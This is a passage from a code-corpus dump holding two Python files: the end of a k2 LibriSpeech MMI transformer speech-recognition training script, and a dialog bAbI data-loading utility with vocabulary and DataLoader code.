P.set_scores_stochastic_(model.module.P_scores)\n assert P.requires_grad is True\n\n curr_batch_objf, curr_batch_frames, curr_batch_all_frames = get_objf(\n batch=batch,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n is_training=True,\n is_update=is_update,\n accum_grad=accum_grad,\n den_scale=den_scale,\n att_rate=att_rate,\n tb_writer=tb_writer,\n global_batch_idx_train=global_batch_idx_train,\n optimizer=optimizer,\n scaler=scaler\n )\n\n total_objf += curr_batch_objf\n total_frames += curr_batch_frames\n total_all_frames += curr_batch_all_frames\n\n if batch_idx % 10 == 0:\n logging.info(\n 'batch {}, epoch {}/{} '\n 'global average objf: {:.6f} over {} '\n 'frames ({:.1f}% kept), current batch average objf: {:.6f} over {} frames ({:.1f}% kept) '\n 'avg time waiting for batch {:.3f}s'.format(\n batch_idx, current_epoch, num_epochs,\n total_objf / total_frames, total_frames,\n 100.0 * total_frames / total_all_frames,\n curr_batch_objf / (curr_batch_frames + 0.001),\n curr_batch_frames,\n 100.0 * curr_batch_frames / curr_batch_all_frames,\n time_waiting_for_batch / max(1, batch_idx)))\n\n if tb_writer is not None:\n tb_writer.add_scalar('train/global_average_objf',\n total_objf / total_frames, global_batch_idx_train)\n\n tb_writer.add_scalar('train/current_batch_average_objf',\n curr_batch_objf / (curr_batch_frames + 0.001),\n global_batch_idx_train)\n # if batch_idx >= 10:\n # print(\"Exiting early to get profile info\")\n # sys.exit(0)\n\n if batch_idx > 0 and batch_idx % 200 == 0:\n total_valid_objf, total_valid_frames, total_valid_all_frames = get_validation_objf(\n dataloader=valid_dataloader,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n scaler=scaler)\n if world_size > 1:\n s = torch.tensor([\n total_valid_objf, total_valid_frames,\n total_valid_all_frames\n ]).to(device)\n\n dist.all_reduce(s, op=dist.ReduceOp.SUM)\n total_valid_objf, total_valid_frames, total_valid_all_frames = s.cpu().tolist()\n\n valid_average_objf = total_valid_objf / total_valid_frames\n model.train()\n logging.info(\n 'Validation average objf: {:.6f} over {} frames ({:.1f}% kept)'\n .format(valid_average_objf,\n total_valid_frames,\n 100.0 * total_valid_frames / total_valid_all_frames))\n\n if tb_writer is not None:\n tb_writer.add_scalar('train/global_valid_average_objf',\n valid_average_objf,\n global_batch_idx_train)\n model.module.write_tensorboard_diagnostics(tb_writer, global_step=global_batch_idx_train)\n prev_timestamp = datetime.now()\n return total_objf / total_frames, valid_average_objf, global_batch_idx_train\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--world-size',\n type=int,\n default=1,\n help='Number of GPUs for DDP training.')\n parser.add_argument(\n '--master-port',\n type=int,\n default=12354,\n help='Master port to use for DDP training.')\n parser.add_argument(\n '--model-type',\n type=str,\n default=\"conformer\",\n choices=[\"transformer\", \"conformer\", \"contextnet\"],\n help=\"Model type.\")\n parser.add_argument(\n '--num-epochs',\n type=int,\n default=10,\n help=\"Number of training epochs.\")\n parser.add_argument(\n '--start-epoch',\n type=int,\n default=0,\n help=\"Number of start epoch.\")\n parser.add_argument(\n '--warm-step',\n type=int,\n default=5000,\n help='The number of warm-up steps for Noam optimizer.'\n )\n parser.add_argument(\n '--lr-factor',\n type=float,\n default=1.0,\n help='Learning rate factor for Noam optimizer.'\n )\n parser.add_argument(\n '--weight-decay',\n type=float,\n default=0.0,\n help='weight decay (L2 penalty) for Noam optimizer.'\n )\n parser.add_argument(\n '--accum-grad',\n type=int,\n default=1,\n help=\"Number of gradient accumulation.\")\n parser.add_argument(\n '--den-scale',\n type=float,\n default=1.0,\n help=\"denominator scale in mmi loss.\")\n parser.add_argument(\n '--att-rate',\n type=float,\n default=0.0,\n help=\"Attention loss rate.\")\n parser.add_argument(\n '--nhead',\n type=int,\n default=4,\n help=\"Number of attention heads in transformer.\")\n parser.add_argument(\n '--attention-dim',\n type=int,\n default=256,\n help=\"Number of units in transformer attention layers.\")\n parser.add_argument(\n '--tensorboard',\n type=str2bool,\n default=True,\n help='Should various information be logged in tensorboard.'\n )\n parser.add_argument(\n '--amp',\n type=str2bool,\n default=True,\n help='Should we use automatic mixed precision (AMP) training.'\n )\n parser.add_argument(\n '--use-ali-model',\n type=str2bool,\n default=True,\n help='If true, we assume that you have run ./ctc_train.py '\n 'and you have some checkpoints inside the directory '\n 'exp-lstm-adam-ctc-musan/ .'\n 'It will use exp-lstm-adam-ctc-musan/epoch-{ali-model-epoch}.pt '\n 'as the pre-trained alignment model'\n )\n parser.add_argument(\n '--ali-model-epoch',\n type=int,\n default=7,\n help='If --use-ali-model is True, load '\n 'exp-lstm-adam-ctc-musan/epoch-{ali-model-epoch}.pt as the alignment model.'\n 'Used only if --use-ali-model is True.'\n )\n parser.add_argument(\n '--use-pruned-intersect',\n type=str2bool,\n default=False,\n help='True to use pruned intersect to compute the denominator lattice. ' \\\n 'You probably want to set it to True if you have a very large LM. ' \\\n 'In that case, you will get an OOM if it is False. ')\n # See https://github.com/k2-fsa/k2/issues/739 for more details\n parser.add_argument(\n '--torchscript',\n type=str2bool,\n default=False,\n help='Should we convert the model to TorchScript before starting training.'\n )\n parser.add_argument(\n '--torchscript-epoch',\n type=int,\n default=-1,\n help='After which epoch should we start storing models with TorchScript,'\n 'so that they can be simply loaded with torch.jit.load(). '\n '-1 disables this option.'\n )\n return parser\n\n\ndef run(rank, world_size, args):\n '''\n Args:\n rank:\n It is a value between 0 and `world_size-1`, which is\n passed automatically by `mp.spawn()` in :func:`main`.\n The node with rank 0 is responsible for saving checkpoint.\n world_size:\n Number of GPUs for DDP training.\n args:\n The return value of get_parser().parse_args()\n '''\n model_type = args.model_type\n start_epoch = args.start_epoch\n num_epochs = args.num_epochs\n accum_grad = args.accum_grad\n den_scale = args.den_scale\n att_rate = args.att_rate\n use_pruned_intersect = args.use_pruned_intersect\n\n fix_random_seed(42)\n setup_dist(rank, world_size, args.master_port)\n\n exp_dir = Path('exp-' + model_type + '-mmi-att-sa-vgg-normlayer')\n setup_logger(f'{exp_dir}/log/log-train-{rank}')\n if args.tensorboard and rank == 0:\n tb_writer = SummaryWriter(log_dir=f'{exp_dir}/tensorboard')\n else:\n tb_writer = None\n # tb_writer = SummaryWriter(log_dir=f'{exp_dir}/tensorboard') if args.tensorboard and rank == 0 else None\n\n logging.info(\"Loading lexicon and symbol tables\")\n lang_dir = Path('data/lang_nosp')\n lexicon = Lexicon(lang_dir)\n\n device_id = rank\n device = torch.device('cuda', device_id)\n\n graph_compiler = MmiTrainingGraphCompiler(\n lexicon=lexicon,\n device=device,\n )\n phone_ids = lexicon.phone_symbols()\n P = create_bigram_phone_lm(phone_ids)\n P.scores = torch.zeros_like(P.scores)\n P = P.to(device)\n\n librispeech = LibriSpeechAsrDataModule(args)\n train_dl = librispeech.train_dataloaders()\n valid_dl = librispeech.valid_dataloaders()\n\n if not torch.cuda.is_available():\n logging.error('No GPU detected!')\n sys.exit(-1)\n\n if use_pruned_intersect:\n logging.info('Use pruned intersect for den_lats')\n else:\n logging.info(\"Don't use pruned intersect for den_lats\")\n\n logging.info(\"About to create model\")\n\n if att_rate != 0.0:\n num_decoder_layers = 6\n else:\n num_decoder_layers = 0\n\n if model_type == \"transformer\":\n model = Transformer(\n num_features=80,\n nhead=args.nhead,\n d_model=args.attention_dim,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4,\n num_decoder_layers=num_decoder_layers,\n vgg_frontend=True)\n elif model_type == \"conformer\":\n model = Conformer(\n num_features=80,\n nhead=args.nhead,\n d_model=args.attention_dim,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4,\n num_decoder_layers=num_decoder_layers,\n vgg_frontend=True,\n is_espnet_structure=True)\n elif model_type == \"contextnet\":\n model = ContextNet(\n num_features=80,\n num_classes=len(phone_ids) + 1) # +1 for the blank symbol\n else:\n raise NotImplementedError(\"Model of type \" + str(model_type) + \" is not implemented\")\n\n model.P_scores = nn.Parameter(P.scores.clone(), requires_grad=True)\n\n if args.torchscript:\n logging.info('Applying TorchScript to model...')\n model = torch.jit.script(model)\n\n model.to(device)\n describe(model)\n\n model = DDP(model, device_ids=[rank])\n\n # Now for the alignment model, if any\n if args.use_ali_model:\n ali_model = TdnnLstm1b(\n num_features=80,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4)\n\n ali_model_fname = Path(f'exp-lstm-adam-ctc-musan/epoch-{args.ali_model_epoch}.pt')\n assert ali_model_fname.is_file(), \\\n f'ali model filename {ali_model_fname} does not exist!'\n ali_model.load_state_dict(torch.load(ali_model_fname, map_location='cpu')['state_dict'])\n ali_model.to(device)\n\n ali_model.eval()\n ali_model.requires_grad_(False)\n logging.info(f'Use ali_model: {ali_model_fname}')\n else:\n ali_model = None\n logging.info('No ali_model')\n\n optimizer = Noam(model.parameters(),\n model_size=args.attention_dim,\n factor=args.lr_factor,\n warm_step=args.warm_step,\n weight_decay=args.weight_decay)\n\n scaler = GradScaler(enabled=args.amp)\n\n best_objf = np.inf\n best_valid_objf = np.inf\n best_epoch = start_epoch\n best_model_path = os.path.join(exp_dir, 'best_model.pt')\n best_epoch_info_filename = os.path.join(exp_dir, 'best-epoch-info')\n global_batch_idx_train = 0 # for logging only\n\n if start_epoch > 0:\n model_path = os.path.join(exp_dir, 'epoch-{}.pt'.format(start_epoch - 1))\n ckpt = load_checkpoint(filename=model_path, model=model, optimizer=optimizer, scaler=scaler)\n best_objf = ckpt['objf']\n best_valid_objf = ckpt['valid_objf']\n global_batch_idx_train = ckpt['global_batch_idx_train']\n logging.info(f\"epoch = {ckpt['epoch']}, objf = {best_objf}, valid_objf = {best_valid_objf}\")\n\n for epoch in range(start_epoch, num_epochs):\n train_dl.sampler.set_epoch(epoch)\n curr_learning_rate = optimizer._rate\n if tb_writer is not None:\n tb_writer.add_scalar('train/learning_rate', curr_learning_rate, global_batch_idx_train)\n tb_writer.add_scalar('train/epoch', epoch, global_batch_idx_train)\n\n logging.info('epoch {}, learning rate {}'.format(epoch, curr_learning_rate))\n objf, valid_objf, global_batch_idx_train = train_one_epoch(\n dataloader=train_dl,\n valid_dataloader=valid_dl,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n optimizer=optimizer,\n accum_grad=accum_grad,\n den_scale=den_scale,\n att_rate=att_rate,\n current_epoch=epoch,\n tb_writer=tb_writer,\n num_epochs=num_epochs,\n global_batch_idx_train=global_batch_idx_train,\n world_size=world_size,\n scaler=scaler\n )\n # the lower, the better\n if valid_objf < best_valid_objf:\n best_valid_objf = valid_objf\n best_objf = objf\n best_epoch = epoch\n save_checkpoint(filename=best_model_path,\n optimizer=None,\n scheduler=None,\n scaler=None,\n model=model,\n epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n valid_objf=valid_objf,\n global_batch_idx_train=global_batch_idx_train,\n local_rank=rank,\n torchscript=args.torchscript_epoch != -1 and epoch >= args.torchscript_epoch\n )\n save_training_info(filename=best_epoch_info_filename,\n model_path=best_model_path,\n current_epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n best_objf=best_objf,\n valid_objf=valid_objf,\n best_valid_objf=best_valid_objf,\n best_epoch=best_epoch,\n local_rank=rank)\n\n # we always save the model for every epoch\n model_path = os.path.join(exp_dir, 'epoch-{}.pt'.format(epoch))\n save_checkpoint(filename=model_path,\n optimizer=optimizer,\n scheduler=None,\n scaler=scaler,\n model=model,\n epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n valid_objf=valid_objf,\n global_batch_idx_train=global_batch_idx_train,\n local_rank=rank,\n torchscript=args.torchscript_epoch != -1 and epoch >= args.torchscript_epoch\n )\n epoch_info_filename = os.path.join(exp_dir, 'epoch-{}-info'.format(epoch))\n save_training_info(filename=epoch_info_filename,\n model_path=model_path,\n current_epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n best_objf=best_objf,\n valid_objf=valid_objf,\n best_valid_objf=best_valid_objf,\n best_epoch=best_epoch,\n local_rank=rank)\n\n logging.warning('Done')\n torch.distributed.barrier()\n cleanup_dist()\n\n\ndef main():\n parser = get_parser()\n LibriSpeechAsrDataModule.add_arguments(parser)\n args = parser.parse_args()\n world_size = args.world_size\n assert world_size >= 1\n mp.spawn(run, args=(world_size, args), nprocs=world_size, join=True)\n\n\ntorch.set_num_threads(1)\ntorch.set_num_interop_threads(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"egs/librispeech/asr/simple_v1/mmi_att_transformer_train.py","file_name":"mmi_att_transformer_train.py","file_ext":"py","file_size_in_byte":27443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"116037806","text":"import json\nimport torch\nimport torch.utils.data as data\nimport unicodedata\nimport string\nimport re\nimport random\nimport time\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\nfrom utils.config import *\nimport logging \nimport datetime\n\nclass Lang:\n def __init__(self):\n self.word2index = {}\n self.word2count = {}\n self.index2word = {UNK_token: 'UNK', PAD_token: \"PAD\", EOS_token: \"EOS\", SOS_token: \"SOS\"}\n self.n_words = 4 # Count default tokens\n \n def index_words(self, sentence):\n for word in sentence.split(' '):\n self.index_word(word)\n\n def index_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1\n\n\nclass Dataset(data.Dataset):\n \"\"\"Custom data.Dataset compatible with data.DataLoader.\"\"\"\n def __init__(self, src_seq, trg_seq, index_seq, gate_seq,src_word2id, trg_word2id,max_len):\n \"\"\"Reads source and target sequences from txt files.\"\"\"\n self.src_seqs = src_seq\n self.trg_seqs = trg_seq\n self.index_seqs = index_seq \n self.gate_seq = gate_seq \n self.num_total_seqs = len(self.src_seqs)\n self.src_word2id = src_word2id\n self.trg_word2id = trg_word2id\n self.max_len = max_len\n\n def __getitem__(self, index):\n \"\"\"Returns one data pair (source and target).\"\"\"\n src_seq = self.src_seqs[index]\n trg_seq = self.trg_seqs[index]\n index_s = self.index_seqs[index]\n gete_s = self.gate_seq[index]\n src_seq = self.preprocess(src_seq, self.src_word2id, trg=False)\n trg_seq = self.preprocess(trg_seq, self.trg_word2id)\n index_s = self.preprocess_inde(index_s,src_seq)\n gete_s = self.preprocess_gate(gete_s)\n \n return src_seq, trg_seq, index_s, gete_s,self.max_len,self.src_seqs[index],self.trg_seqs[index]\n\n def __len__(self):\n return self.num_total_seqs\n \n def preprocess(self, sequence, word2id, trg=True):\n \"\"\"Converts words to ids.\"\"\"\n if(trg):\n sequence = [word2id[word] if word in word2id else UNK_token for word in sequence.split(' ')]+ [EOS_token]\n sequence = torch.Tensor(sequence)\n else:\n sequence = [word2id[word] if word in word2id else UNK_token for word in sequence.split(' ')]\n sequence = torch.Tensor(sequence)\n return sequence\n\n def preprocess_inde(self, sequence,src_seq):\n \"\"\"Converts words to ids.\"\"\"\n sequence = sequence + [len(src_seq)-1]\n sequence = torch.Tensor(sequence)\n return sequence\n\n def preprocess_gate(self, sequence):\n \"\"\"Converts words to ids.\"\"\"\n sequence = sequence + [0]\n sequence = torch.Tensor(sequence)\n return sequence\n\ndef collate_fn(data):\n def merge(sequences,max_len):\n lengths = [len(seq) for seq in sequences]\n if (max_len):\n padded_seqs = torch.ones(len(sequences), max_len[0]).long()\n else:\n padded_seqs = torch.ones(len(sequences), max(lengths)).long()\n for i, seq in enumerate(sequences):\n end = lengths[i]\n padded_seqs[i, :end] = seq[:end]\n return padded_seqs, lengths\n\n # sort a list by sequence length (descending order) to use pack_padded_sequence\n data.sort(key=lambda x: len(x[0]), reverse=True)\n # seperate source and target sequences\n src_seqs, trg_seqs, ind_seqs, gete_s, max_len, src_plain,trg_plain = zip(*data)\n # merge sequences (from tuple of 1D tensor to 2D tensor)\n src_seqs, src_lengths = merge(src_seqs,max_len)\n trg_seqs, trg_lengths = merge(trg_seqs,None)\n ind_seqs, _ = merge(ind_seqs,None)\n gete_s, _ = merge(gete_s,None)\n \n src_seqs = Variable(src_seqs).transpose(0,1)\n trg_seqs = Variable(trg_seqs).transpose(0,1)\n ind_seqs = Variable(ind_seqs).transpose(0,1)\n gete_s = Variable(gete_s).transpose(0,1)\n if USE_CUDA:\n src_seqs = src_seqs.cuda()\n trg_seqs = trg_seqs.cuda()\n ind_seqs = ind_seqs.cuda()\n gete_s = gete_s.cuda()\n return src_seqs, src_lengths, trg_seqs, trg_lengths, ind_seqs, gete_s, src_plain, trg_plain\n\n\ndef read_langs(file_name, max_line = None):\n logging.info((\"Reading lines from {}\".format(file_name)))\n # Read the file and split into lines\n data=[]\n context=\"\"\n u=None\n r=None\n with open(file_name) as fin:\n cnt_ptr = 0\n cnt_voc = 0\n max_r_len = 0\n cnt_lin = 1\n for line in fin:\n line=line.strip()\n if line:\n nid, line = line.split(' ', 1)\n if '\\t' in line:\n u, r = line.split('\\t')\n context += str(u)+\" \" \n contex_arr = context.split(' ')[LIMIT:]\n r_index = []\n gate = []\n for key in r.split(' '):\n index = [loc for loc, val in enumerate(contex_arr) if val == key]\n if (index):\n index = max(index)\n gate.append(1)\n cnt_ptr +=1\n else: \n index = len(contex_arr) - 1 \n gate.append(0) \n cnt_voc +=1 \n r_index.append(index)\n\n if len(r_index) > max_r_len: \n max_r_len = len(r_index)\n data.append([\" \".join(contex_arr)+\"$$$$\",r,r_index,gate])\n context+=str(r)+\" \" \n else:\n r=line\n if USEKB:\n context+=str(r)+\" \" \n else:\n cnt_lin+=1\n if(max_line and cnt_lin>=max_line):\n break\n context=\"\"\n max_len = max([len(d[0].split(' ')) for d in data])\n avg_len = sum([len(d[0].split(' ')) for d in data]) / float(len([len(d[0].split(' ')) for d in data]))\n logging.info(\"Pointer percentace= {} \".format(cnt_ptr/(cnt_ptr+cnt_voc)))\n logging.info(\"Max responce Len: {}\".format(max_r_len))\n logging.info(\"Max Input Len: {}\".format(max_len))\n logging.info(\"AVG Input Len: {}\".format(avg_len))\n return data, max_len, max_r_len\n\n\ndef get_seq(pairs,lang,batch_size,type,max_len): \n x_seq = []\n y_seq = []\n ptr_seq = []\n gate_seq = []\n for pair in pairs:\n x_seq.append(pair[0])\n y_seq.append(pair[1])\n ptr_seq.append(pair[2])\n gate_seq.append(pair[3])\n if(type):\n lang.index_words(pair[0])\n lang.index_words(pair[1])\n \n dataset = Dataset(x_seq, y_seq,ptr_seq,gate_seq,lang.word2index, lang.word2index,max_len)\n data_loader = torch.utils.data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=type,\n collate_fn=collate_fn)\n return data_loader\n\ndef prepare_data_seq(task,batch_size=100,shuffle=True):\n file_train = 'data/dialog-bAbI-tasks/dialog-babi-task{}trn.txt'.format(task)\n file_dev = 'data/dialog-bAbI-tasks/dialog-babi-task{}dev.txt'.format(task)\n file_test = 'data/dialog-bAbI-tasks/dialog-babi-task{}tst.txt'.format(task)\n if (int(task) != 6):\n file_test_OOV = 'data/dialog-bAbI-tasks/dialog-babi-task{}tst-OOV.txt'.format(task)\n pair_train,max_len_train, max_r_train = read_langs(file_train, max_line=None)\n pair_dev,max_len_dev, max_r_dev = read_langs(file_dev, max_line=None)\n pair_test,max_len_test, max_r_test = read_langs(file_test, max_line=None)\n max_r_test_OOV = 0\n max_len_test_OOV = 0\n if (int(task) != 6):\n pair_test_OOV,max_len_test_OOV, max_r_test_OOV = read_langs(file_test_OOV, max_line=None)\n \n max_len = max(max_len_train,max_len_dev,max_len_test,max_len_test_OOV) +1\n max_r = max(max_r_train,max_r_dev,max_r_test,max_r_test_OOV) +1\n lang = Lang()\n \n train = get_seq(pair_train,lang,batch_size,True,max_len)\n dev = get_seq(pair_dev,lang,batch_size,False,max_len)\n test = get_seq(pair_test,lang,batch_size,False,max_len)\n if (int(task) != 6):\n testOOV = get_seq(pair_test_OOV,lang,batch_size,False,max_len)\n else:\n testOOV = []\n \n \n logging.info(\"Read %s sentence pairs train\" % len(pair_train))\n logging.info(\"Read %s sentence pairs dev\" % len(pair_dev))\n logging.info(\"Read %s sentence pairs test\" % len(pair_test))\n if (int(task) != 6):\n logging.info(\"Read %s sentence pairs test\" % len(pair_test_OOV)) \n logging.info(\"Max len Input %s \" % max_len)\n logging.info(\"Vocab_size %s \" % lang.n_words)\n logging.info(\"USE_CUDA={}\".format(USE_CUDA))\n \n return train, dev, test, testOOV, lang, max_len, max_r\n\n","sub_path":"utils/utils_babi.py","file_name":"utils_babi.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}